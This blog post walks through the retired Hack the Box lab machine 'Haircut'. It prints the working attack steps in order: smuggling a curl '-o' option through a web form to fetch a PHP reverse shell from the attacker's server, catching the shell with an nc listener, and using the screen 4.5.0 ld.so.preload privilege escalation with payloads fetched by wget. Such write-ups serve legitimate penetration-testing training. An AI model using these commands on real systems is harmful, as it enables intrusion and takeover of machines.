Hack the Box (HTB) machines walkthrough series — “Haircut”
Continuing once again with our series on Hack the Box (HTB) machines, this article contains the walkthrough of another HTB machine named “Haircut.”
Earn two pentesting certifications at once!
Enroll in one boot camp to earn both your Certified Ethical Hacker (CEH) and CompTIA PenTest+ certifications — backed with an Exam Pass Guarantee.
HTB is an excellent platform that hosts machines belonging to multiple OSes. It also has some other interesting challenges as well. Individuals have to solve the puzzle (simple enumeration and pentest) in order to log into the platform and download the VPN pack to connect to the machines hosted on the HTB platform.
Note: Only writeups of retired HTB machines are allowed. The machine in this article, named “Haircut,” is retired.
Let’s start with this machine.
1. Download the VPN pack for the individual user and use the guidelines to log into the HTB VPN.
2. The “Haircut” machine IP is 10.10.10.24.
3. We will adopt the same methodology of performing penetration testing. Let’s start with enumeration in order to gain as much information for the machine as possible.
4. We start the enumeration process with an nmap scan. Below is the output of the nmap scan. [CLICK ALL IMAGES TO ENLARGE FOR DETAIL]
<<nmap -sC -sV -oA haircut 10.10.10.24>>
5. Since there are no more leads for now, let’s try a brute-force directory traversal with the help of gobuster.
6. Let’s start to enumerate the finding from gobuster with exposed.php.
<<gobuster -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 20>>
7. As you can see below, the page has a text box and looks like a requester. Click on Go.
8. Below we can see that the page test.html has been retrieved from the localhost.
9. Let’s try to see if we can make a request to our attacking box, 10.10.14.2. Below, we can see that the request has been made, but since there is no Web server running on our box as of now, the connection was refused. It’s important to note that behind the scenes, a curl request has been made
<<http://<attacking_box_ip>/test.html>>
10. Let’s set up a Python httpserver on port 80 and try to make a request from the page again to confirm our diagnosis in the previous step. After that, if we make a similar request as in the previous step, we can the request has reached our box and resulted in 404 since there is a test.html that we are serving from the Web server root.
<<python -m SimpleHTTPServer 80>>
11. We can now try to make the exposed.php fetch our PHP reverse shell and upload it to the uploads directory found by gobuster earlier.
- Copy the PHP reverse shell from Kali to the operating folder as shell.php and change the IP field.
<<$ip=<attacking_box_ip>>>
- Make sure that the Python httpserver is running from the operating folder. If it is not, start the Web server like below <<python -m SimpleHTTPServer 80>>
- Make the following request from exposed.php: <<http://10.10.14.2/shell.php -o uploads/shell.php>>
12. Now set up an nc listener on the attacking box with the following command
<<nc -nlvp 1234>>
13. Now if we visit the page http://10.10.10.24/uploads/shell.php, we will get the reverse shell, as shown below.
14. Grab the user.txt file.
<<whoami>>
<<cd home>>
<<cd Desktop>>
<<cat user.txt>>
15. Now let’s start the chase to grab root.txt, for which we have to escalate privileges.
16. Let’s start with grabbing information about the kernel version. An important point to note here is that the Linux version has some known vulnerabilities, but we will explore some other ways of escalating the privilege. Also, the box is 64-bit.
<<uname -a>>
17. The next step I always perform, as in previous writeups, is to see the what all binaries have the SUID bit set.
<<find / -perm -u=s-type f 2>/dev/null>>
18. After enumerating each binary, it was found that the screen version 4.5.0 has a local privilege escalation vulnerability, as shown below.
19. The same exploit is present in searchsploit as well. The exploit, however, requires us to compile some files before triggering the exploit.
20. Below, files were created and compiled on the attacking box.
- Creation of libhax.c
<<cat <<EOF > /tmp/libhax.c>>
- Compilation of libhax.c to create a shared object.
<<gcc -fPIC -shared -ldl-o /tmp/libhax.so /tmp/libhax.c>>
- Creation of rootshell.c
<<cat <<EOF > /tmp/rootshell.c >>
- Compilation of rootshell.c
<<gcc -o /tmp/rootshell /tmp/rootshell.c>>
21. Start the Python server like below to server the compiled files
<<python -m SimpleHTTPServer 8001>>
22. On the victim box, go to the tmp directory and download the compiled files, since the exploit states so.
<<cd tmp>>
<<wget http://attacking _bx_ip:8001/rootshell>>
<<wget http://attacking _bx_ip:8001/libhax.so>>
23. Now move to /etc and execute umask 000.
<<cd /etc>>
<<umask 000>>
24. Also execute the following command:
<<screen -D -m -L ld.so.preload echo -ne “x0a/tmp/libhax.so”>>
25. We can see that in the above screenshot there was an error regarding the ELF class, which shows that the loaded file is a 32-bit file where the victim box is 64-bit.
26. We can confirm this with following commands on the compiled files on the attacking box.
<<file libhax.so>>
<<file rootshell>>
27. This means that we have to repeat steps 20-24 again, but with the compiled files in 64-bit.
28. Below, we can see that the files are now in 64-bit.
<<file libhax.so>>
<<file rootshell>>
29. Repeating step 24 as shown below:
30. Executing /tmp/rootshell, and we are root as shown below:
<</tmp/rootshell>>
31. Grab root.txt file.
<<cat root.txt>>
This is a very straightforward capture-the-flag box. The interesting lesson this box teaches us is to understand and read the exploit before executing them, and to understand the error as well while still executing the exploit, as well as the best way to overcome those.
Become a Certified Ethical Hacker, guaranteed!
Get training from anywhere to earn your Certified Ethical Hacker (CEH) Certification — backed with an Exam Pass Guarantee.
We will continue to see more such interesting boxes in the next few articles.
Enroll in an Ethical Hacking Boot Camp and earn two of the industry’s most respected certifications — guaranteed.
- CEH exam voucher
- PenTest+ exam voucher
- Exam Pass Guarantee
- Live online hacking training
In this Series
- Hack the Box (HTB) machines walkthrough series — “Haircut”
- Intelligence-led pentesting and the evolution of Red Team operations
- Red Teaming: Taking advantage of Certify to attack AD networks
- How ethical hacking and pentesting is changing in 2022
- Ransomware penetration testing: Verifying your ransomware readiness
- Red Teaming: Main tools for wireless penetration tests
- Fundamentals of IoT firmware reverse engineering
- Red Teaming: Top tools and gadgets for physical assessments
- Red teaming: Initial access and foothold
- Top tools for red teaming
- What is penetration testing, anyway?
- Red Teaming: Persistence Techniques
- Red Teaming: Credential dumping techniques
- Top 6 bug bounty programs for cybersecurity professionals
- Tunneling and port forwarding tools used during red teaming assessments
- SigintOS: Signal Intelligence via a single graphical interface
- Top tools for mobile android assessments
- Top tools for mobile iOS assessments
- Red Team: C2 frameworks for pentesting
- Inside 1,602 pentests: Common vulnerabilities, findings and fixes
- Red teaming tutorial: Active directory pentesting approach and tools
- Red Team tutorial: A walkthrough on memory injection techniques
- Python for active defense: Monitoring
- Python for active defense: Network
- Python for active defense: Decoys
- How to write a port scanner in Python in 5 minutes: Example and walkthrough
- Using Python for MITRE ATT&CK and data encrypted for impact
- Explore Python for MITRE ATT&CK exfiltration and non-application layer protocol
- Explore Python for MITRE ATT&CK command-and-control
- Explore Python for MITRE ATT&CK email collection and clipboard data
- Explore Python for MITRE ATT&CK lateral movement and remote services
- Explore Python for MITRE ATT&CK account and directory discovery
- Explore Python for MITRE ATT&CK credential access and network sniffing
- Top 10 security tools for bug bounty hunters
- Kali Linux: Top 5 tools for password attacks
- Kali Linux: Top 5 tools for post exploitation
- Kali Linux: Top 5 tools for database security assessments
- Kali Linux: Top 5 tools for information gathering
- Kali Linux: Top 5 tools for sniffing and spoofing
- Kali Linux: Top 8 tools for wireless attacks
- Kali Linux: Top 5 tools for penetration testing reporting
- Kali Linux overview: 14 uses for digital forensics and pentesting
- Top 19 Kali Linux tools for vulnerability assessments
- Explore Python for MITRE ATT&CK persistence
- Explore Python for MITRE ATT&CK defense evasion
- Explore Python for MITRE ATT&CK privilege escalation
- Explore Python for MITRE ATT&CK initial access
- Top 18 tools for vulnerability exploitation in Kali Linux
- Explore Python for MITRE PRE-ATT&CK, network scanning and Scapy
- Kali Linux: Top 5 tools for social engineering
- Basic snort rules syntax and usage [updated 2021]
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, (ISC)², Cisco, Microsoft and more!
Penetration testing
Intelligence-led pentesting and the evolution of Red Team operations
Penetration testing
Red Teaming: Taking advantage of Certify to attack AD networks
Penetration testing
Penetration testing
Ransomware penetration testing: Verifying your ransomware readiness